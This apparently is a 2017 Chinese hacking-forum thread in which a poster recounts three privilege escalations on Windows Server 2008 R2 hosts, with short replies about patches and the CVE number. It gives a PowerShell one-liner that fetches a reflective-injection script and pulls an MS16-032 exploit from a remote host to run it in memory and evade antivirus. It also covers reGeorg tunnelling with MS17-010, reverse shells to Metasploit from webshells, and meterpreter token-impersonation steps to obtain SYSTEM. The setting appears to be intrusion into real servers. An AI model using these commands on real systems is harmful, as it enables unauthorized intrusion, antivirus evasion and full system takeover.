[【通过】] 三次提权(2008R2)

[复制链接]
Tequila 发表于 2017-6-25 20:29:49 | 显示全部楼层 |阅读模式

正式成员|主题 |帖子 |积分 7

三次提权(针对2008 R2)

0x01

环境: ms16-032上传之后运行被杀

解决: 使用powershell直接加载内存运行


powershell.exe -exec bypass -nop -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://x.x.x.x/16-032.exe -ExeArgs 'whoami' -ForceASLR"  

0x02
问题: ms16-032未能提
解决: 上传tunnel.ashx,reGeorg配合proxifier把目标流量设置为走代理,ms17-010走一波即可

坑点: 本地需要两个python,reGeorg使用python2.7,另外一个2.6, 如果打了KB4019264,估计gg。


0x03

环境: 小马被查杀,目标上护卫神防篡改系统,web目录不可写,ms16-032之类的提权失败。本来是留了一个小马,然后被杀了,另外留了一个免杀掉。刚开始没想到提权,
解决: 先试用powershell反弹到msf,然后使用ms-075

https://github.com/foxglovesec/RottenPotato

这个提权有点运气成分,同一个目标上午没提下来,吃完饭下午可以了。github上面有youtube的视频,看第二个视频就可以了,很详细,简单来说就是以下步骤

获取meterpreter之后:
getprivs

使用这个模块:
use incognito

查看已有的token:
list_tokens -u

上传到目标主机之后执行:
execute -Hc -f [exe]

再查看已有token
list_tokens -u

如果有system:
impersonate_token "NT AUTHORITY\\SYSTEM"

没有的话多执行几次试试。从菜刀反弹到msf用powershell直接反弹就可以了。

评分

参与人数 1酒票 +5 收起 理由
管理05 + 5 欢迎加入90!

查看全部评分

dicky 发表于 2017-6-25 20:42:12 | 显示全部楼层

正式成员|主题 |帖子 |积分 134

系统打了多少补丁呢?
 楼主 Tequila 发表于 2017-6-25 20:43:29 | 显示全部楼层

正式成员|主题 |帖子 |积分 7

RE: 三次提权(2008R2)

本帖最后由 Tequila 于 2017-6-25 20:45 编辑
dicky 发表于 2017-6-25 20:42
系统打了多少补丁呢?

最后一个貌似300多个。

我也忘记了,看最后的补丁他把三月份的ms17-010什么的都打上了,感觉有点运气成分
lufei 发表于 2017-6-25 23:19:02 | 显示全部楼层

90Sec Team|主题 |帖子 |积分 84

RottenPotato  这个Potato  微软的漏洞编号 ms 多少?
 楼主 Tequila 发表于 2017-6-26 09:06:57 | 显示全部楼层

正式成员|主题 |帖子 |积分 7

RE: 三次提权(2008R2)

lufei 发表于 2017-6-25 23:19
RottenPotato  这个Potato  微软的漏洞编号 ms 多少?

http://www.cvedetails.com/cve/cve-2016-3225
CVE-2016-3225


WHILE 发表于 2017-6-26 12:30:45 | 显示全部楼层

正式成员|主题 |帖子 |积分 4

powershell可以用来绕过waf?表示不太懂这玩意儿
 楼主 Tequila 发表于 2017-6-26 13:05:18 | 显示全部楼层

正式成员|主题 |帖子 |积分 7

RE: 三次提权(2008R2)

WHILE 发表于 2017-6-26 12:30
powershell可以用来绕过waf?表示不太懂这玩意儿

提权的时候运行被杀了,上传上去没问题,就是一运行那个exe就没了,ps可以直接加载exe到内存。

Jumbo 发表于 2017-6-26 13:33:32 | 显示全部楼层

正式成员|主题 |帖子 |积分 228

一直以为Powershell一定要交互式才可以
浮生 发表于 2017-6-27 09:57:12 | 显示全部楼层

正式成员|主题 |帖子 |积分 86

RE: 三次提权(2008R2)

Jumbo 发表于 2017-6-26 13:33
一直以为Powershell一定要交互式才可以

。。。 非要交互的话,就没得玩了啊,现在都是bat里写powershell,直接上线msf了,当然我更喜欢用帝国。。。
快速回复 返回顶部 返回列表